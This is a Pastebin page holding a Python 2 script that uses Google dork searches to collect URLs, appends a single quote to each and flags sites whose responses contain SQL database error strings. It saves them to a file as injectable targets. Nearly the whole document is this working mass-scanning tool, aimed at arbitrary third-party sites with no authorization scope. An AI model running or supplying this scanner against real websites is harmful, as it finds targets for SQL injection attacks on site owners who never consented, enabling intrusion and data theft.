Googleinurl

PYTHON SQL Injection vulnerability scanner - Python

Nov 17th, 2013
942
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #PYTHON SQL Injection vulnerability scanner (Powered by Google.)
  2. #Coded by : wh4tsec
  3. #GNU General Public License, version 2 (GPL-2.0)
  4.  
  5.  
  6. #!/usr/bin/python
  7. import urllib2
  8. import sys
  9.  
  10. #          Name of the output file ex: vul.dat
  11. filename = "vul.dat"
  12.  
  13. # This function gets a site url and returns 1 if its vulnurable. else, 0 will be returned
  14. def isvul ( url ):
  15.     usock = urllib2.urlopen(url)
  16.     data = usock.read()
  17.     usock.close()
  18.     if "You have an error in your SQL" in data:
  19.        return 1;
  20.     elif "supplied argument is not a valid MySQL result resource in" in data:
  21.        return 1;
  22.     elif "Division by zero in" in data:
  23.        return 1;
  24.     elif "Microsoft JET Database" in data:
  25.        return 1;
  26.     elif "Microsoft OLE DB Provider for SQL Server" in data:
  27.        return 1;
  28.     elif "ODBC Microsoft Access Driver" in data:
  29.        return 1;
  30.     elif "Unclosed quotation mark" in data:
  31.        return 1;
  32.     elif "Microsoft OLE DB Provider for Oracle" in data:
  33.        return 1;
  34.     elif "Incorrect syntax near" in data:
  35.        return 1;
  36.     elif "SQL query failed" in data:
  37.        return 1;
  38.     return 0;
  39. # Gets inputs from user
  40. dork = raw_input("Enter dork: ")
  41. ttld = raw_input("Enter tld: ")
  42. lng = raw_input("Language: ")
  43. results = raw_input("Results: ")
  44.  
  45. file = open(filename,"w")
  46. print 'WORKING',
  47.  
  48. # Getting matched urls from google
  49. from google import search
  50. for url in search('inurl:' + dork, tld='' + ttld, lang='' + lng, stop=(0 + int(results))):
  51.     url = url + "'"
  52.     print '.',
  53.     if isvul(url) == 1:
  54.        file.write(url)
  55.        file.write("\r\n")
  56.        print 'BOOM!',
  57.  
  58. file.close()
  59.  
  60. print "\r\nDone, urls of vulnurable sites saved in 'vul.dat'"
  61. print "coded by: wh4tsec"
  62. print "------------------------------------------------------"
  63. print "Credits: BeautifulSoup-2.3.0 And Google Search Python"
RAW Paste Data